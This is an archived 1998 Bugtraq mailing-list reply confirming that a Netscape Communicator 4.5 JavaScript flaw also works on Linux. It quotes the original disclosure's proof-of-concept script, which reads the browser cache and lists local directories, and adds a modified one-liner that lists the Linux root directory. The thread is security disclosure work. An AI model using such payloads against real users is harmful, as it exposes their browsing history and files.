[8349] in bugtraq
Re: Javascript bug in Netscape Communicator 4.5
daemon@ATHENA.MIT.EDU (Ryan Gray)
Fri Oct 30 16:34:35 1998
Date: Thu, 29 Oct 1998 17:09:23 -0600
Reply-To: Ryan Gray <tool@SNIPER.ORG>
From: Ryan Gray <tool@SNIPER.ORG>
To: BUGTRAQ@NETSPACE.ORG
In-Reply-To: <19981028182202.13038.qmail@hotmail.com>
Hello,
Just wanted to add that Netscape Communicator 4.5b2 on Slackware
Linux 3.5 (kernel 2.0.34) is susceptible to this also. I was able to get
the script to read my cache. As for the local reading, with a little
modification, it'll do that to.
Example:
the line in George's script that reads local files is -
sl=window.open('wysiwyg://1/file:///c|/');
With just little change, taking the Linux directory structure into
consideration and adding proper backslash escapes -
sl=window.open('wysiwyg://1/file://\/');
That'll give you listing of '/' on the local box. (tsk, tsk, tsk)
Regards,
Ryan Gray
http://www.sniper.org - Home of the Afterlife
On Wed, 28 Oct 1998, Georgi Guninski wrote:
> There is a bug in Netscape Communicator 4.5, 4.07, 3.04 under Windows 95
> (probably others) which allows reading user's cache (the urls the user
> has
> visited, including the info in GET forms). Reading local directories
> content
> is also allowed. This info may be sent to an arbitrary host.
> The bug may be exploited by email.
>
> Demonstration is available at:
> Cache reading: http://www.geocities.com/ResearchTriangle/1711/b4.html
> Directory reading:
> http://www.geocities.com/ResearchTriangle/1711/b5.html
>
> The javascript code is:
>
> sl=window.open('wysiwyg://1/about:cache');
> //For Netscape 3.04 remove 'wysiwyg://1/'
> sl2=sl.window.open();
> sl2.location="javascript:function f() {s='<SCRIPT>cr=\"\t \"; x=\"Here
> are some links from your cache:\"; for(i=0;i<5;i++)
> x+=opener.document.links[i]+cr;alert(x);</'+'SCRIPT>';return s};f()";
> sl2.location.reload();
>
> Workaround: Disable Javascript.
>
> Regards,
> Georgi Guninski
> http://www.geocities.com/ResearchTriangle/1711/
>
>
> ______________________________________________________
> Get Your Private, Free Email at http://www.hotmail.com
>
